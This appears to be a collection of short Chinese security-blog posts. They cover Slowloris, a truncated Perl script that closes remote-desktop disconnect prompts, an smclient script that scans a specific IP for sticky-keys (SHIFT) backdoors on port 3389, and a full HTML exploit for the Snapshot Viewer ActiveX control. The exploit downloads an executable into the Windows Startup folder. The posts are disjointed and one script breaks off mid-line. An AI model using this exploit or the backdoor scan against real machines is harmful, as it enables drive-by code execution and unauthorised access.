limitipconn仅能对已经建立的连接做控制，Slowloris的连接处于建立中，所以对Slowloris攻击limitipconn应该是无能为力的

#!/usr/bin/perl

use warnings;
use Win32::GUI;

use constant WM_CLOSE          => 16;
   
sub monitor {
    my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');
    Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}

sub monitor1 {
    my $handle = Win32::GUI::FindWindow('', '断开 Windows 会话');
    W

首先3389的SHIFT后门极少
其次大部分SHIFT后门都加密

所以手工一个一个尝试是挺傻的，写成自动扫描的话，还能让人忍受
下载ftp://ftp.microsoft.com/ResKit/win2000/roboclient.zip
smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d

shift_backdoor.txt：
job
{
connect("","","",1,1);
sleep(2000);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);

今天有人发了个Snapshot Viewer的ADV，结合CERT那篇dranzer.pdf，重现漏洞

EXP:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>

http://www.cert.org/archive/pdf/dranzer.pdf   

按照说明，集成了很多新的元素，功能大大超过COMRaider和Axman
尤其是关于“second-order”和“Initialization Parameters”，目前公开的资料还非常少

本来已经参考COMRaider和Axman写了一堆脚本，看来没有必要了，等Dranzer^_^

男人是不是越老越喜欢研究点啥？